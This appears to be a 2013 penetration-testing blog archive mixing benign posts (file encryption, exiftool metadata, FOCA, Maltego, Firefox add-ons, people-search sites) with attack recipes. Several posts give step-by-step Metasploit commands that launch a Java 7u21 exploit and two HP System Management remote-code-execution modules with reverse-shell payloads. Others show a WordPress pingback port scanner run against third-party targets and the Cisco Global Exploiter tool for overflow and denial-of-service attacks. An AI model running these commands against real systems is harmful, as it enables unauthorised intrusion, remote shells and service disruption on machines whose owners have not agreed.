All great things are simple, and many can be expressed in single words: freedom, justice, honor, duty, mercy, hope

Wednesday, July 31, 2013

How to encrypt sensitive data?

0 comments
Encryption Wizard (EW) is a simple, strong, Java file and folder encryptor for protection of sensitive information (FOUO, Privacy Act, CUI, etc.). EW encrypts all file types for data-at-rest and data-in-transit protection. Without installation or elevated privileges, EW runs on Windows, Mac, Linux, Solaris, and other computers with Sun Java.

Backtrack 5 has already come with ewizard ; it `s located in the /pentest/misc/ewizard . But it`s not latest version so we have to download latest version

Download Ew-public from here

Extract zip file where you can see one java file ; & ewizard user manual which contained all information about how to use it to encrypt & decrypt your private data.

For linux user
java -jar EW-Public-3.3.5.jar

For windows user double click on jar file & you can also install from tools & click on install


encrypt_data
It open Encryption wizard.Now click on file menu & add folder or file to encrypt.




encrypt_data

Sunday, July 28, 2013

Extract metadata from file in Backtrack

0 comments
Metadata is stored in any document by authoring application which can be user-name ; comment ;creation date;modification date.Metadata is very important in computer Forensic ; well know hacker group Anonymous `s members are arrested due to metadata. Because they upload document without clearing metadata ; so by reading metadata we can find lots of juicy information.


Previous we saw how we can extract metadata using FOCA from website ; But we can also extract metadata from BACKTRACK using exiftool.

If you want to write your own python script then visit our new section of blog script .

Exiftool can extract metadata from images ;documents ,videos etc.Most of file format are supported in exiftool. EXIFTOOL can also write metadata into Documents. So before uploading document remove metadata from it

How to use?
(1)If you are not using backtrack than you can download from git. For ubuntu user type following command in terminal.
git clone https://github.com/pandastream/libimage-exiftool-perl-9.27.git exiftool
sudo apt-get install libarchive-zip-perl

(2)cd exiftool
(3)./exiftool /path of file.

Extract metadata from pdf file:-

./exiftool /path of pdf file

exiftool-metadata

Thursday, July 25, 2013

Wordpress Pingback Port Scanner

0 comments

WordpressPingbackPortScanner

Wordpress exposes a so called Pingback API to link to other blogposts. Using this feature you can scan other hosts on the intra- or internet via this server. You can also use this feature for some kind of distributed port scanning: You can scan a single host using multiple Wordpress Blogs exposing this API. This issue was fixed in Wordpress 3.5.1. Older versions are vulnerable, if the XML-RPC Interface is active.

(1)Download from here

(2)Extract it in folder

(3)cd Downloads/WordpressPingbackPortScanner-master/

(4)It does not work default ruby version which is 1.9.2 ; so by running update-alternatives we can change ruby version to 1.8.2
update-alternatives --config ruby
select 1

(5)
gem install bundler
bundle install
wordpress-pingback-port-scanner
 Use:-

Quick-scan a target via a blog:

ruby wppps.rb -t http://www.target.com http://www.myblog.com/

Use multiple blogs to scan a single target:

ruby wppps.rb -t http://www.target.com http://www.myblog1.com/ http://www.myblog2.com/ http://www.myblog3.com/

Scan a free wordpress.com blog (all ports) from the internal network:

ruby wppps.rb -a -t http://localhost http://myblog.wordpress.com/

Tuesday, July 23, 2013

List of vulnerability in wordpress 3.5.1.

0 comments


Recently true-caller and Tango messenger is hacked by Syrian-Electronic-Army.
And large amount of Database has been stolen. Now what is common in these sites?
They have word-press 3.5.1 which is vulnerable to some attack.


A weakness and multiple vulnerabilities have been reported in WordPress, which can be exploited by malicious users to disclose certain system information and bypass certain security restrictions and by malicious people to conduct spoofing and cross-site scripting attacks, bypass certain security restrictions, and cause a DoS (Denial of Service).

1) An error when calculating the hash cycle count within the "crypt_private()" method in /wp-includes/class-phpass.php can be exploited to exhaust CPU and memory resources by sending HTTP requests with a specially crafted password cookie.

Successful exploitation of this vulnerability requires knowledge of the URL for a password-protected post.

This vulnerability is confirmed in version 3.5.1. Prior versions may also be affected.



Here is full details & exploitation is available ;visit this link.

2) An unspecified error within the HTTP API related to server-side requests can be exploited to gain access to the site.

Here is full details.
http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html

3) An unspecified error can be exploited to bypass certain restrictions when publishing posts.

Successful exploitation requires the "Contributor" role.

4) An unspecified error can be exploited to reassign the post authorship.

5) Certain input related to SWFUpload is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Sunday, July 21, 2013

How to solve metasploit problem in SET?

0 comments

If you installed metasploit from git repository then you donot face any problem with SET. But If you have installed metasploit from its binary version then when you tried to running social engineering toolkit metasploit attack then might be you get error of some ruby bundle. Here is solution of that problem. I tested on SET Version: 5.2.1 & metasploit v4.6.2-1.

We are going to install Ruby 1.9.3 using RVM. Running all this command in msf3 folder

root@bt:~# cd /opt/metasploit/apps/pro/msf3/

root@bt:/opt/metasploit/apps/pro/msf3# bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) 
 
root@bt:/opt/metasploit/apps/pro/msf3# source /etc/profile.d/rvm.sh
 
root@bt:/opt/metasploit/apps/pro/msf3# rvm -v 

Once RVM is up and running we need to get a couple of libraries that will be required by the Ruby installation:
root@bt:/opt/metasploit/apps/pro/msf3# for package in zlib openssl libxslt libxml2; do rvm pkg install $package; done 

And finally the Ruby 1.9.3 runtime: 

root@bt:/opt/metasploit/apps/pro/msf3# rvm install 1.9.3
root@bt:/opt/metasploit/apps/pro/msf3# rvm 1.9.3 --default
root@bt:/opt/metasploit/apps/pro/msf3# ruby -v
root@bt:/opt/metasploit/apps/pro/msf3# gem install bundler
root@bt:/opt/metasploit/apps/pro/msf3# bundle install

Now open set from its path ; before running set type command like below
cd /pentest/exploits/set

source /etc/profile.d/rvm.sh

rvm 1.9.3 –default

./se-toolkit

Now you can use any metasploit attack from SET .

Thursday, July 18, 2013

Information Gathering Using FOCA

1 comments
Last month I put some of tutorial on Information gathering which is first step of penetration testing  , & today we will go ahead in this series . As you know Backtrack has all tools for penetration testing , but this tool is not come with backtrack ; It`s very powerful  tool for information gathering and its name is FOCA (Fingerprinting Organizations with Collected Ar­chieves). It is windows based  tool ; you can install it in linux with help of wine. But i used it in windows  , you can find here “how to install foca inbacktrack?


What kind of data can be found? 

•Metadata:
–Information stored to give information about the document.
•For example: Creator, Organization, etc..
•Hidden information:
–Information internally stored by programs and not editable.
•For example: Template paths, Printers, db structure, etc…
•Lost data:
–Information which is in documents due to human mistakes or negligence, because it was not intended to be there.
•For example: Links to internal servers, data hidden by format, etc…

Download:-

(1)Go to official website here.
(2)Enter your valid email address at end of page & you will receive email which contain Download link.
(3)Install Foca by running setup.

Sample Example of FOCA:-

(1)Open foca click on create new project.
(2)Enter project name & domain name & click on create.


(3)On right side you can see different file types which will be searching in given domain. Select which file type you want to search &  click on search.

(4)As you can see in above image ; it will find different files from domain using google & bing search engine.

Monday, July 15, 2013

Firefox Add-ons for penetration testers

0 comments

In this brief post, we are listing a few popular and interesting Firefox add-ons that are useful for penetration testers. These add-ons vary from information gathering tools to attacking tools. If you are using BACKTRACK than use OWASP Mantra which has lots of useful Add-ons.

(1)Firebug
Firebug is a nice add-on that integrates a web development tool inside the browser. With this tool, you can edit and debug HTML, CSS and JavaScript live in any webpage to see the effect of changes. It helps in analyzing JS files to find XSS vulnerabilities. It’s an really helpful add-on in finding DOM based XSS for security testing professionals.Add Firebug in your Browser from this link: https://addons.mozilla.org/en-US/firefox/addon/firebug/

(2)Web Developer
Web Developer is another nice add-on that adds various web development tools in the browser. It helps in web application penetration testing.Add Web Developer in your browser from this link: https://addons.mozilla.org/de/firefox/addon/web-developer/

(3)Live HTTP Headers
Live HTTP Headers is a really helpful penetration testing add-on for Firefox. It displays live headers of each http request and response. You can also save header information by clicking on the button in the lower left corner. I don’t think that there is any kind of need to tell how important this add-on is for the security testing process.Add
Live HTTP Headers to Firefox with this link: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

(4)Tamper Data
Tamper Data is similar to the Live HTTP Header add-on but, has header editing capabilities. With the tamper data add-on, you can view and modify HTTP/HTTPS headers and post parameters. Thus it helps in security testing web application by modifying POST parameters. It can be used in performing XSS and SQL Injection attacks by modifying header data.Add the
Tamper data add-on to Firefox browser with this link: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)


(5)Hackbar
Hackbar is a simple penetration tool for Firefox. It helps in testing simple SQL injection and XSS holes. You cannot execute standard exploits but you can easily use it to test whether vulnerability exists or not. You can also manually submit form data with GET or POST requests. It also has encryption and encoding tools. Most of the times, this tool helps in testing XSS vulnerability with encoded XSS payloads. It also supports keyboard shortcuts to perform various tasks.I am sure, most of the persons in the security field already know about this tool. This tool is mostly used in finding POST XSS vulnerabilities because it can send POST data manually to any page you like. With the ability of manually sending POST form data, you can easily bypass client side validations of the page. If your payload is being encoded at client side, you can use an encoding tool to encode your payload and then perform the attack. If the application is vulnerable to the XSS, I am sure you will find the vulnerability with the help of the Hackbar add-on on Firefox browser.Add
Hackbar add-on to Firefox browser with this link: https://addons.mozilla.org/en-US/firefox/addon/hackbar/ 

Friday, July 12, 2013

Open source Information Gathering tool-Maltgo

0 comments
Maltego is an open source intelligence and forensics application. It allows you to mine and gather information, and represent the information in a meaningful way. The word "open source" in Maltego means that it gathers information from the open source resources; it does not mean that Maltego is open source software.

Maltego allows you to enumerate Internet infrastructure information, such as: 
Domain names
DNS names
Whois information
Network blocks
IP addresses

It can also be used to gather information about people, such as: 
Companies and organizations related to the person
E-mail address related to the person
Websites related to the person
Social networks related to the person
Phone numbers related to the person 
There are more than 70 transforms available in Maltego. The word "transform" refers to the information gathering phase done by Maltego. 
 
Maltego-example

Tuesday, July 9, 2013

Information Gathering using Public Resources

0 comments

On the Internet, there are several public resources that can be used to collect
information regarding a target domain. The benefit of using these resources is that we don't generate network traffic to the target domain directly, so the target domain may not know about our activities. 

Following are the resources that can be use

(1)http://www.archive.org :-Contains an archive of websites. 

(2)http://www.domaintools.com:-Domain name intelligence. 

(3)http://serversniff.net:-Free "Swiss Army Knife" for networking,
serverchecks, and routing 

(4)http://centralops.net:-Free online network utilities: domain, e-mail,
browser, ping, traceroute, Whois, and so on. 

(5)http://www.robtex.com:- Allows you to search for domain and network
information. 

(6)http://www.pipl.com:-Allows you to search people on the Internet by first
and last name, city, state, and country. 

(7)http://yoname.com :-Allows you to search for people across social
networking sites and blogs. 

(8)http://wink.com:-Free search engine to find people by name, phone
number, e-mail, website, photo, and so on. 

(9)http://www.isearch.com:- Free search engine to find people by name, phone
number, and e-mail address. 

(10)http://www.tineye.com:- TinEye is a reverse image search engine. We can use
TinEye to find out where the image came from, how it is being used, if modified versions of the image exist, or to find higher resolution versions. 

(11)http://www.sec.gov/edgar.shtml :- To search for information regarding public listed companies in Securities and Exchange Commission.

Wednesday, July 3, 2013

Exploit for Java version 7u21 and earlier

0 comments
Java Applet ProviderSkeleton Insecure Invoke Method:-

This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier.

Exploit Targets

    0 - Generic (Java Payload) (default)
    1 - Windows x86 (Native Payload)
    2 - Mac OS X x86 (Native Payload)
    3 - Linux x86 (Native Payload)

$ msfconsole
msf > use exploit/multi/browser/java_jre17_provider_skeleton
msf exploit(java_jre17_provider_skeleton) > show payloads
msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_jre17_provider_skeleton) > set LHOST [MY IP ADDRESS]
msf exploit(java_jre17_provider_skeleton) > exploit





Tuesday, July 2, 2013

How to exploit Directory traversal vulnerability?

0 comments
Backtrack has lots of tools for web-application testing. Directory traversal is one of the critical vulnerability in web-application. Previously i post about what is directory traversal & how to bypass its filter , but that process is manual, it can consume lots of time.But in bactrack automatic tools are available for this test which is DOTDOTPWN.

If you are on other distro , then you can download it form here.

It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc.

Also, it has a protocol-independent module to send the desired payload to the host and port specified. On the other hand, it also could be used in a scripting way using the STDOUT module.

It's written in perl programming language and can be run either under *NIX or Windows platforms. It's the first Mexican tool included in BackTrack Linux .



Fuzzing modules supported in this version:


- HTTP

- HTTP URL

- FTP

- TFTP

- Payload (Protocol independent)

- STDOUT

Exploit HP sytem managment

0 comments
 There are two modules available for exploitation of hp system management.

(1)HP System Management Anonymous Access Code Execution

This module exploits an anonymous remote code execution on HP System Management 7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on a request against /proxy/DataValidation. In order to work HP System Management must be configured with Anonymous access enabled.


Exploit Targets

    0 - HP System Management 7.1.1 - Linux (CentOS) (default)
    1 - HP System Management 6.3.0 - Linux (CentOS)

msfconsole
msf > use exploit/linux/http/hp_system_management
msf exploit(hp_system_management) > show payloads
msf exploit(hp_system_management) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(hp_system_management) > set LHOST [MY IP ADDRESS]
msf exploit(hp_system_management) > set RHOST [TARGET IP]
msf exploit(hp_system_management) > exploit

(2)HP System Management Homepage JustGetSNMPQueue Command Injection

This module exploits a vulnerability found in HP System Management Homepage. By supplying a specially crafted HTTP request, it is possible to control the 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc), which will be used in a exec() function. This results in arbitrary code execution under the context of SYSTEM

Exploit Targets

    0 - Windows (default)

msfconsole
msf > use exploit/windows/http/hp_sys_mgmt_exec
msf exploit(hp_sys_mgmt_exec) > show payloads
msf exploit(hp_sys_mgmt_exec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(hp_sys_mgmt_exec) > set LHOST [MY IP ADDRESS]
msf exploit(hp_sys_mgmt_exec) > set RHOST [TARGET IP]
msf exploit(hp_sys_mgmt_exec) > exploit

CIsco Global Exploter

0 comments
Cisco Global Exploiter (CGE), is an advanced, simple and fast security testing tool/ exploit engine, that is able to exploit 14 vulnerabilities in disparate Cisco switches and routers.  CGE is command-line driven perl script which has a simple and easy to use front-end.

Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability

Download from here

Use:-

perl cge.pl <target> <vulnerability number>
UA-35960349-1